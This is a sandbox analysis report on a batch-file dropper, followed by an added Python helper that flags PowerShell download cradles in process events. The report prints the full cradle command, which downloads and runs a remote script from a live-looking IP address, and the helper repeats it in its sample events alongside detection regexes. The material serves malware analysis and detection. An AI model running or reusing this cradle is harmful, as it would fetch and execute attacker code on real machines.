Analysis
- max time kernel: 105s
- max time network: 141s
- platform: windows10_x64
- resource: win10v200217
- submitted: 05-03-2020 05:10

Static task: static1

Behavioral task: behavioral1
- Sample: 1Agr4GZR.bat
- Resource: win7v200217 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: 1Agr4GZR.bat
- Resource: win10v200217 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: 1Agr4GZR.bat
- Size: 195B
- MD5: d8f17b7d64fd968c76fbda7167c2bf8e
- SHA1: f90525aef93a39c5d07aab4cd7c5e8a87bc91ffe
- SHA256: 6bdb2e75595098a2c5dd9026ec2ac6d13fa279cd6d23217e7c0e28cc3318c708
- SHA512: bfa55509af5be01bef540b299bf7737db0e69b7d811ec59412335f7be17e22d2fe1a4483d693e1daa4dc7f6538006669715b0718a5e78a7f750875c61cbb22d9
- Score: 10/10
Malware Config (extracted)
- Language: ps1
- Source: URLs
- ps1.dropper: http://185.103.242.78/pastes/1Agr4GZR
Signatures

Program crash (1 IoC)
  pid   pid_target   process        target process
  3284  3628         WerFault.exe   powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description                 pid    process
  Token: SeRestorePrivilege   3284   WerFault.exe
  Token: SeBackupPrivilege    3284   WerFault.exe
  Token: SeDebugPrivilege     3284   WerFault.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
  pid    process
  3284   WerFault.exe (14 occurrences)

Note on attribution: all three signatures fire on WerFault.exe (PID 3284), the Windows Error Reporting handler that the system launched for the crash of powershell.exe (PID 3628), and enabling SeDebugPrivilege and enumerating processes is what WER does to take a crash dump. They record the PowerShell stage failing, not behavior of the sample itself; the sample-attributable activity in this run is the download cradle in the process tree below, and the 10/10 score comes from the extracted ps1.dropper URL above. Whether the stage fetched from that URL executed before the crash cannot be determined from this report.
Processes

1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1Agr4GZR.bat"
   PID: 1952

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/1Agr4GZR');Invoke-CTSICHQLFDEF;Start-Sleep -s 10000"
      PID: 3628

      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3628 -s 704
         Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses
         PID: 3284

The batch file's only job is to spawn PowerShell with a classic download cradle: fetch a script body over plain HTTP with System.Net.WebClient.DownloadString, hand it to IEX (Invoke-Expression), call a function from that script (Invoke-CTSICHQLFDEF), then sleep to keep the process alive. The WerFault.exe argument -p 3628 names the PID being reported on, which is how the crash handler is tied back to the PowerShell process.
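The following triage helper is an added example and is not part of the sandbox report or its tooling. It runs over a handful of constructed process-creation events modeled on the tree above (the event shape, field names, the placeholder parent PID 1000 and the benign control event are all assumptions), flags a PowerShell process whose command line combines IEX with a web fetch, extracts the fetched URL as an IoC, records the process lineage, and resolves a WerFault.exe launch back to the crashed PID via its -p argument. The cradle check deliberately requires both the execute primitive and the fetch primitive, so a script that only downloads a file, or only evaluates a local string, is not flagged by it.

```python
"""Triage helper for a batch-file dropper process tree.

Added example, not code from the sandbox report. Event layout and field
names are assumptions; the sample events below are constructed to mirror
the report's process tree plus one benign control event.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample events (assumed shape), modelled on the report.
SAMPLE_EVENTS = [
    ProcEvent(1952, 1000, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1Agr4GZR.bat"'),
    ProcEvent(3628, 1952, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/1Agr4GZR');Invoke-CTSICHQLFDEF;Start-Sleep -s 10000" """),
    ProcEvent(3284, 3628, r"C:\Windows\SysWOW64\WerFault.exe",
              r"C:\Windows\SysWOW64\WerFault.exe -u -p 3628 -s 704"),
    # Benign control (constructed): an admin running a local script, no cradle.
    ProcEvent(4100, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\inventory.ps1"),
]

# A download cradle needs an execute primitive AND a fetch primitive.
EXEC_RE = re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)
FETCH_RE = re.compile(
    r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"();]+", re.I)
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_download_cradle(ev: ProcEvent) -> bool:
    """True for a PowerShell launch whose command line both fetches and evaluates."""
    if basename(ev.image) not in POWERSHELL_IMAGES:
        return False
    return bool(EXEC_RE.search(ev.cmdline) and FETCH_RE.search(ev.cmdline))


def extract_urls(cmdline: str) -> list:
    """URLs embedded in a command line, for use as network IoCs."""
    return URL_RE.findall(cmdline)


def werfault_target(ev: ProcEvent):
    """PID a WerFault.exe launch reports on (its '-p <pid>' argument), else None."""
    if basename(ev.image) != "werfault.exe":
        return None
    args = ev.cmdline.split()
    for i, a in enumerate(args[:-1]):
        if a.lower() == "-p" and args[i + 1].isdigit():
            return int(args[i + 1])
    return None


def lineage(by_pid: dict, pid: int) -> str:
    """Ancestor chain as 'root > ... > leaf', stopping at unknown PIDs or cycles."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return " > ".join(reversed(chain))


def triage(events: list) -> list:
    """Return findings: download cradles (with URLs and lineage) and crash links."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if is_download_cradle(ev):
            findings.append({
                "type": "download_cradle",
                "pid": ev.pid,
                "lineage": lineage(by_pid, ev.pid),
                "urls": extract_urls(ev.cmdline),
            })
        target = werfault_target(ev)
        if target is not None:
            crashed = by_pid.get(target)
            findings.append({
                "type": "crash",
                "pid": ev.pid,
                "crashed_pid": target,
                "crashed_image": basename(crashed.image) if crashed else None,
            })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

On the constructed events this yields one cradle finding for PID 3628 with lineage cmd.exe > powershell.exe and the paste URL as its IoC, and one crash finding linking WerFault PID 3284 to powershell.exe PID 3628; the benign control is not flagged. Against real telemetry (Sysmon event 1, Windows 4688 with command-line auditing), the same two regexes are the part to tune: obfuscated cradles that split or encode the IEX and WebClient strings will need decoding of -EncodedCommand and string-concatenation before this check sees them.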